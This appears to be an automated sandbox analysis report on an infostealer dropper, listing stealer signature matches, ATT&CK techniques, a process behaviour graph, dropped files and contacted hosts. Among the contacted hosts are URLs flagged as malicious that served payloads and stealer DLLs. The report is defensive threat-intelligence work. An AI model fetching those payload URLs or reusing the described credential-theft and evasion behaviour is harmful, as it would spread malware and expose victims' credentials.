                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000002.3282767064.0000000000ABB000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected Mars stealer
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2454770621.0000013E34F8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2454770621.0000013E31D8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED
                            Yara detected Stealc
                            Source: Yara matchFile source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Yara detected zgRAT
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C930C40 sqlite3_bind_zeroblob,2_2_6C930C40

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                            Windows Management Instrumentation                            		11
                            DLL Side-Loading                            		1
                            Abuse Elevation Control Mechanism                            		1
                            Disable or Modify Tools                            		2
                            OS Credential Dumping                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		12
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts11
                            Native API                            		1
                            Windows Service                            		11
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            Account Discovery                            		Remote Desktop Protocol4
                            Data from Local System                            		22
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter                            		Logon Script (Windows)1
                            Windows Service                            		1
                            Abuse Elevation Control Mechanism                            		Security Account Manager3
                            File and Directory Discovery                            		SMB/Windows Admin Shares1
                            Email Collection                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
                            Process Injection                            		3
                            Obfuscated Files or Information                            		NTDS286
                            System Information Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                            Software Packing                            		LSA Secrets551
                            Security Software Discovery                            		SSHKeylogging124
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            DLL Side-Loading                            		Cached Domain Credentials351
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading                            		DCSync13
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            Application Window Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                            Process Injection                            		/etc/passwd and /etc/shadow1
                            System Owner/User Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430187 Sample: 4BfhCycV4B.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 86 download.iolo.net 2->86 88 windowsupdatebg.s.llnwi.net 2->88 90 9 other IPs or domains 2->90 114 Snort IDS alert for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 17 other signatures 2->120 11 4BfhCycV4B.exe 1 4 2->11         started        16 UniversalInstaller.exe 2->16         started        signatures3 process4 dnsIp5 98 185.172.128.90, 49705, 80 NADYMSS-ASRU Russian Federation 11->98 100 185.172.128.228, 49706, 80 NADYMSS-ASRU Russian Federation 11->100 102 2 other IPs or domains 11->102 78 C:\Users\user\AppData\Local\Temp\u3z0.1.exe, PE32 11->78 dropped 80 C:\Users\user\AppData\Local\Temp\u3z0.0.exe, PE32 11->80 dropped 82 C:\Users\user\AppData\Local\...\Qg_Appv5.exe, PE32 11->82 dropped 146 Detected unpacking (changes PE section rights) 11->146 148 Detected unpacking (overwrites its own PE header) 11->148 18 u3z0.0.exe 69 11->18         started        23 Qg_Appv5.exe 7 11->23         started        25 u3z0.1.exe 12 8 11->25         started        27 WerFault.exe 16 11->27         started        150 Maps a DLL or memory area into another process 16->150 152 Found direct / indirect Syscall (likely to bypass EDR) 16->152 29 cmd.exe 16->29         started        file6 signatures7 process8 dnsIp9 92 185.172.128.76, 49708, 80 NADYMSS-ASRU Russian Federation 18->92 62 C:\Users\user\AppData\...\softokn3[1].dll, PE32 18->62 dropped 64 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 18->64 dropped 66 C:\Users\user\AppData\...\mozglue[1].dll, PE32 18->66 dropped 76 9 other files (5 malicious) 18->76 dropped 126 Detected unpacking (changes PE section rights) 18->126 128 Detected unpacking (overwrites its own PE header) 18->128 130 Tries to steal Mail credentials (via file / registry access) 18->130 140 7 other signatures 18->140 31 WerFault.exe 18->31         started        68 C:\Users\user\AppData\Local\...\relay.dll, PE32 23->68 dropped 70 C:\Users\user\...\UniversalInstaller.exe, PE32 23->70 dropped 72 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 23->72 dropped 132 Found direct / indirect Syscall (likely to bypass EDR) 23->132 33 UniversalInstaller.exe 6 23->33         started        94 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->94 134 Checks if the current machine is a virtual machine (disk enumeration) 25->134 37 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 25->37         started        74 C:\Users\user\AppData\Local\Temp\ypbquxnwo, PE32 29->74 dropped 136 Writes to foreign memory regions 29->136 138 Maps a DLL or memory area into another process 29->138 39 MSBuild.exe 29->39         started        41 conhost.exe 29->41         started        file10 signatures11 process12 file13 56 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 33->56 dropped 58 C:\Users\user\...\UniversalInstaller.exe, PE32 33->58 dropped 60 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 33->60 dropped 104 Found direct / indirect Syscall (likely to bypass EDR) 33->104 43 UniversalInstaller.exe 1 33->43         started        106 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->106 108 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->108 110 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->110 112 Tries to harvest and steal browser information (history, passwords, etc) 39->112 signatures14 process15 signatures16 142 Maps a DLL or memory area into another process 43->142 144 Found direct / indirect Syscall (likely to bypass EDR) 43->144 46 cmd.exe 4 43->46         started        process17 file18 84 C:\Users\user\AppData\Local\Temp\fak, PE32 46->84 dropped 154 Writes to foreign memory regions 46->154 156 Found hidden mapped module (file has been removed from disk) 46->156 158 Maps a DLL or memory area into another process 46->158 50 MSBuild.exe 46->50         started        54 conhost.exe 46->54         started        signatures19 process20 dnsIp21 96 91.215.85.66 PINDC-ASRU Russian Federation 50->96 122 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 50->122 124 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 50->124 signatures22

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            4BfhCycV4B.exe39%VirustotalBrowse
                            4BfhCycV4B.exe100%AviraHEUR/AGEN.1313018
                            4BfhCycV4B.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\fak100%AviraHEUR/AGEN.1307453
                            C:\Users\user\AppData\Local\Temp\fak100%Joe Sandbox ML
                            C:\ProgramData\freebl3.dll0%ReversingLabs
                            C:\ProgramData\mozglue.dll0%ReversingLabs
                            C:\ProgramData\msvcp140.dll0%ReversingLabs
                            C:\ProgramData\nss3.dll0%ReversingLabs
                            C:\ProgramData\softokn3.dll0%ReversingLabs
                            C:\ProgramData\vcruntime140.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe3%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\fak59%ReversingLabsByteCode-MSIL.Trojan.RedLine
                            C:\Users\user\AppData\Local\Temp\u3z0.1.exe4%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\ypbquxnwo59%ReversingLabsByteCode-MSIL.Trojan.RedLine
                            C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe0%ReversingLabs
                            C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll0%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            bg.microsoft.map.fastly.net0%VirustotalBrowse
                            note.padd.cn.com1%VirustotalBrowse
                            windowsupdatebg.s.llnwi.net0%VirustotalBrowse
                            download.iolo.net0%VirustotalBrowse
                            fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                            http://www.indyproject.org/0%URL Reputationsafe
                            http://ocsp.sectigo.com00%URL Reputationsafe
                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                            https://sectigo.com/CPS0D0%URL Reputationsafe
                            https://sectigo.com/CPS00%URL Reputationsafe
                            http://ocsp.thawte.com00%URL Reputationsafe
                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            bg.microsoft.map.fastly.net
                            		199.232.210.172
                            		truefalseunknown
                            iolo0.b-cdn.net
                            		185.93.1.244
                            		truefalse
                              		high
                              note.padd.cn.com
                              		176.97.76.106
                              		truefalseunknown
                              svc.iolo.com
                              		20.157.87.45
                              		truefalse
                                		high
                                fp2e7a.wpc.phicdn.net
                                		192.229.211.108
                                		truefalseunknown
                                windowsupdatebg.s.llnwi.net
                                		69.164.42.0
                                		truefalseunknown
                                download.iolo.net
                                		unknown
                                		unknowntrueunknown
                                westus2-2.in.applicationinsights.azure.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://185.172.128.228/BroomSetup.exefalse
                                    		unknown
                                    http://185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                      		unknown
                                      http://185.172.128.76/15f649199f40275b/sqlite3.dlltrue
                                        		unknown
                                        http://185.172.128.76/15f649199f40275b/softokn3.dlltrue
                                          		unknown
                                          http://185.172.128.59/syncUpd.exefalse
                                            		unknown
                                            http://note.padd.cn.com/1/Qg_Appv5.exefalse
                                              		unknown
                                              http://185.172.128.76/15f649199f40275b/nss3.dlltrue
                                                		unknown
                                                http://185.172.128.76/15f649199f40275b/mozglue.dlltrue
                                                  		unknown
                                                  http://185.172.128.228/ping.php?substr=eightfalse
                                                    		unknown
                                                    http://185.172.128.76/15f649199f40275b/msvcp140.dlltrue
                                                      		unknown
                                                      http://svc.iolo.com/__svc/sbv/DownloadManager.ashxfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://monitor.azure.com//.defaultSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.vmware.com/0Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl04BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://snapshot.monitor.azure.com/&SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.u3z0.1.exe, 00000009.00000003.2649676502.00000000026E4000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.0000000002646000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.00000000026A9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.iolo.com/company/legal/sales-policy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.indyproject.org/4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000003.2649676502.00000000026A2000.00000004.00001000.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://185.172.128.76/3cd2b41cbde8fc9c.phpc906315950e2729657ad6775bff99-release2f2345b38ae43488aec06u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                          		unknown
                                                                          https://support.iolo.com/support/solutions/articles/44001781185?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.iolo.com/company/legal/privacy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.codeplex.com/CompositeWPFSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://support.iolo.com/support/solutions/articles/44001781185SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37AAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://scripts.sil.org/OFLSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.iolo.com/company/legal/sales-policy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://185.172.128.76/15f649199f40275b/mozglue.dllIu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://support.iolo.com/supportSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alertsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://download.avira.com/download/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModelSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://dejavu.sourceforge.netSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.mozilla.com/en-US/blocklist/u3z0.0.exe, u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.iolo.com/company/legal/privacy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37947000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://rt.services.visualstudio.com/lSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                              		high
